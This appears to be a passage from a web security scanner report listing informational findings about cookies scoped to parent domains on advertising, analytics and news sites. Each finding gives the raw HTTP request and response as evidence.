P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

16.36. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ar_p90452457=exp=1&initExp=Thu May 5 00:58:51 2011&recExp=Thu May 5 00:58:51 2011&prad=310177527&arc=211671722&; expires=Wed 03-Aug-2011 00:58:51 GMT; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p90452457&PRAd=310177527&AR_C=211671722 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/310177527/direct;wi.300;hi.250/01/557100524?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1539894;BnId=1;itime=557100524;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:51182:56419:56148:57362:56835:51186:56673:56780:50220:56969:56299:54057:56987:50229:54063:57144:60183:60130;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:58:51 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p90452457=exp=1&initExp=Thu May 5 00:58:51 2011&recExp=Thu May 5 00:58:51 2011&prad=310177527&arc=211671722&; expires=Wed 03-Aug-2011 00:58:51 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27159

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"310177527",Pid:"p90452457",Arc:"211671722",Location:
...[SNIP]...

16.37. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:58 GMT; path=/; domain=.voicefive.com;
BMX_G=method->-1,ts->1304557018; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:58 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:58 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557018; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25569

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...

16.38. http://b.aol.com/vanity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.aol.com
Path:	/vanity/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; expires=Thu, 03-Nov-2011 15:50:47 GMT; path=/; domain=.aol.com
CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; expires=Thu, 05-May-2011 12:56:24 GMT; path=/; domain=.aol.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vanity/?ts=1304574981812&h=www.aol.com&v=12&t=AOL.com%20-%20News%2C%20Sports%2C%20Weather%2C%20Entertainment%2C%20Local%20%26%20Lifestyle&r=&l=0&k=1&ms=2&dL_ch=us.aolportal&dL_dpt=main5%20AOL.com%205.0%20Main&template=maing-grid7&cobrand=main5&plids=60474%7Cdaily-buzz6%7Ccol2%7C2%2C50380%7Ctrending-stories%7Ccol3%7C5%2C31799%7Csign-in-sign-out%7Cnull%7C3%2C58322%7Cleaveback-pixel%7Ccol3%7C9%2C58669%7Cwelcome-messaging%7Cnull%7C2%2C10696%7Cbrand-6%7Cfooter%7C1%2C51734%7Cfooterlinks%7Cfooter%7C2%2C52762%7Cstock-markets-markets%7Ccol1R%7C3%2C10694%7Cbrand-1%7Cfooter%7C1%2C8834%7Cbrand-7%7Cfooter%7C1%2C60289%7Ctrending-stories-feed%7Ccol3%7C5%2C8838%7Cbrand-8%7Cfooter%7C1%2C60572%7Cdl1%7Cdl-wide%7C1%2C60536%7Ctrending-now%7Ccol3%7C6%2C10820%7Cbrand-3%7Cfooter%7C1%2C59315%7Cdirectory%7Ccol1L%7C1%2C8870%7Cbrand-5%7Cfooter%7C1%2C59113%7Cmore-news-huffpost%7Ccol1R%7C1%2C60539%7Cstandalonevj%7Ccol2%7C1%2C54569%7Cnewsletter2%7Ccol3%7C8%2C51721%7Cprodsvcs%7Ccol1L%7C2%2C60329%7Clocal%7Ccol1R%7C2%2C60544%7Cfollow-me-module%7Ccol3%7C4%2C8826%7Cbrand-2%7Cfooter%7C1%2C59310%7Cmore-news%7Ccol1R%7C1%2C60496%7Cdaily-buzz7%7Ccol2%7C2%2C12684%7Cbrand-4%7Cfooter%7C1%2C51754%7Cqnav-radio%7Cnull%7C7%2C60499%7Cdaily-buzz8%7Ccol2%7C2%2C51753%7Cqnav-aim%7Cnull%7C7%2C8821%7Cbrand-9%7Cfooter%7C1%2C20322%7Cweather%7Cnull%7C4%2C60514%7Cbusiness-news%7Ccol1R%7C4%2C18826%7Centertainment-news%7Ccol1R%7C6%2C60556%7Cdaily-buzz5%7Ccol2%7C2%2C60557%7Cdaily-buzz9%7Ccol2%7C2%2C60558%7Cdaily-buzz1%7Ccol2%7C2%2C60554%7Cdaily-buzz3%7Ccol2%7C2%2C60555%7Cdaily-buzz4%7Ccol2%7C2%2C22965%7Centertainment-news%7Ccol1R%7C6%2C42552%7Clogo%7Cnull%7C5%2C60466%7Cdaily-buzz2%7Ccol2%7C2%2C59525%7Cfeatured-brands%7Cfooter%7C1%2C60560%7Cvideo-feature%7Ccol3%7C7%2C60521%7Csports-news%7Ccol1R%7C5%2C60569%7Cvideo-promo3%7Ccol3%7C7%2C47438%7Cqnav-mail%7Cnull%7C7%2C60567%7Cvideo-promo2%7Ccol3%7C7%2C60566%7Cvideo-promo1%7Ccol3%7C7 HTTP/1.1
Host: b.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1303579081524-New%7C1366651081524%3B%20s_nrgvo%3DNew%7C1366651081525%3B; MUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.be91

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:24 GMT
Server: Apache
Set-Cookie: MUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.be91; expires=Thu, 03-Nov-2011 15:50:47 GMT; path=/; domain=b.aol.com
Set-Cookie: UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; expires=Thu, 03-Nov-2011 15:50:47 GMT; path=/; domain=.aol.com
Set-Cookie: CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; expires=Thu, 05-May-2011 12:56:24 GMT; path=/; domain=.aol.com
Cache-Control: max-age=0
Expires: Thu, 05 May 2011 00:56:24 GMT
Content-Length: 42
Content-Type: image/gif

GIF89a.............!.......,...........D.;

16.39. http://b.dailyfinance.com/vanity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.dailyfinance.com
Path:	/vanity/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; expires=Thu, 03-Nov-2011 15:53:05 GMT; path=/; domain=.dailyfinance.com
CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; expires=Thu, 05-May-2011 12:58:42 GMT; path=/; domain=.dailyfinance.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vanity/?ts=1304575093064&h=www.dailyfinance.com&v=10&t=Forrester%20Research%20To%20Broadcast%20Its%20First-Quarter%20Earnings%20Conference%20Call%20Via%20The%20Internet%20-%20DailyFinance&r=&l=0&k=1&ms=0&dL_ch=us.dailyfin&dL_ste=aoldailyfin%2Caolsvc&UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2 HTTP/1.1
Host: b.dailyfinance.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575093082-New%7C1367647093082%3B%20s_nrgvo%3DNew%7C1367647093084%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:42 GMT
Server: Apache
Set-Cookie: UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; expires=Thu, 03-Nov-2011 15:53:05 GMT; path=/; domain=.dailyfinance.com
Set-Cookie: CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; expires=Thu, 05-May-2011 12:58:42 GMT; path=/; domain=.dailyfinance.com
Cache-Control: max-age=0
Expires: Thu, 05 May 2011 00:58:42 GMT
Content-Length: 42
Content-Type: image/gif

GIF89a.............!.......,...........D.;

16.40. http://b.huffingtonpost.com/vanity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.huffingtonpost.com
Path:	/vanity/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; expires=Thu, 03-Nov-2011 15:54:34 GMT; path=/; domain=.huffingtonpost.com
CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; expires=Thu, 05-May-2011 13:00:11 GMT; path=/; domain=.huffingtonpost.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vanity/?ts=1304575139901&h=www.huffingtonpost.com&v=10&t=Breaking%20News%20and%20Opinion%20on%20The%20Huffington%20Post&r=http%3A%2F%2Fwww.aol.com%2F&l=0&k=1&ms=1&dL_ch=us.hpmg&dL_dpt=front&UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903 HTTP/1.1
Host: b.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.5.10.1304575105; s_pers=%20s_getnr%3D1304575139917-New%7C1367647139917%3B%20s_nrgvo%3DNew%7C1367647139919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:11 GMT
Server: Apache
Set-Cookie: UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; expires=Thu, 03-Nov-2011 15:54:34 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; expires=Thu, 05-May-2011 13:00:11 GMT; path=/; domain=.huffingtonpost.com
Cache-Control: max-age=0
Expires: Thu, 05 May 2011 01:00:11 GMT
Content-Length: 42
Content-Type: image/gif

GIF89a.............!.......,...........D.;

16.41. http://b.mmafighting.com/vanity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.mmafighting.com
Path:	/vanity/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.c9aa; expires=Thu, 03-Nov-2011 15:51:56 GMT; path=/; domain=.mmafighting.com
CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.c9aa; expires=Thu, 05-May-2011 12:57:33 GMT; path=/; domain=.mmafighting.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vanity/?ts=1304575045039&h=www.mmafighting.com&v=10&t=Former%20NHL%20Enforcer%20Donald%20Brashear%20to%20Fight%20at%20Ringside%20MMA%2011%20--%20MMA%20Fighting&r=&l=0&k=1&ms=501&domain=sports&subdomain=mmafighting&platform=bs&dL_ch=us.mmafight&dL_dpt=spr%20%3A%20MMA&dL_sDpt=spr%20%3A%20Article&dL_cmsID=bsd%3A19931900&UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.c9aa HTTP/1.1
Host: b.mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:33 GMT
Server: Apache
Set-Cookie: UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.c9aa; expires=Thu, 03-Nov-2011 15:51:56 GMT; path=/; domain=.mmafighting.com
Set-Cookie: CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.c9aa; expires=Thu, 05-May-2011 12:57:33 GMT; path=/; domain=.mmafighting.com
Cache-Control: max-age=0
Expires: Thu, 05 May 2011 00:57:33 GMT
Content-Length: 42
Content-Type: image/gif

GIF89a.............!.......,...........D.;

16.42. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 04-May-2013 00:56:23 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?rn=93511347&C1=2&C2=1000009&C4=http%3A%2F%2Fwww.aol.com%2F&C5=us.aolportal&C7=http%3A%2F%2Fwww.aol.com%2F&C8=AOL.com%20-%20News%2C%20Sports%2C%20Weather%2C%20Entertainment%2C%20Local%20%26%20Lifestyle HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Pragma: no-cache
Date: Thu, 05 May 2011 00:56:23 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 04-May-2013 00:56:23 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

16.43. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 04-May-2013 01:00:36 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=3&c2=6034986&c3=UMAA-UMA-095-33-MRT&c4=STND_MFESRP_FY11H2_BR_CusSrch_1x1&c5=284115772&c6=&cj=1&rn=58195579331368210 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Thu, 05 May 2011 01:00:36 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 04-May-2013 01:00:36 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

16.44. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 04-May-2013 00:57:52 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035805&d.c=gif&d.o=spnprod&d.x=52797902&d.t=page&d.u=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec1_lnk3%257C60545 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?icid=maing-grid7%7Cmain5%7Cdl4%7Csec1_lnk3%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Thu, 05 May 2011 00:57:52 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 04-May-2013 00:57:52 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

16.45. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=875e3f1e-184.84.247.65-1303349046; expires=Sat, 04-May-2013 00:56:59 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253735228&c4=178115060&c5=1&c6=34&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fmusic.aol.com%2F_uac%2Fadpage.html&c9=&c10=http%3A%2F%2Fmusic.aol.com%2Fradioguide%2Fbb&c15=&1304575017593 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_G=method->-1,ts->1304557018; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 05 May 2011 00:56:59 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Sat, 04-May-2013 00:56:59 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

16.46. http://bid.openx.net/json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.openx.net
Path:	/json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

s=c6c7c20e-c3b2-426b-ab0c-ecdc9669188d; version=1; path=/; domain=.openx.net;
p=1304557170; version=1; path=/; domain=.openx.net; max-age=63072000;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /json?c=OXM_27407467597&pid=c7be9c39-b00b-4e4a-9ba7-a7008d2ad56b&s=300x250&f=1.19&cid=&url=http%3A%2F%2Fwww.huffingtonpost.com%2F%3Ficid%3Dnavbar_huffpo_main5 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=c6c7c20e-c3b2-426b-ab0c-ecdc9669188d; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1304557170; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_27407467597({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAGXQu07DMBQG4D9pk7pxo
...[SNIP]...

16.47. http://blogsearch.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogsearch.google.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=66f43664986180c9:TM=1304592763:LM=1304592763:S=sW2wguO7dQkK_rw8; expires=Sat, 04-May-2013 10:52:43 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:43 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
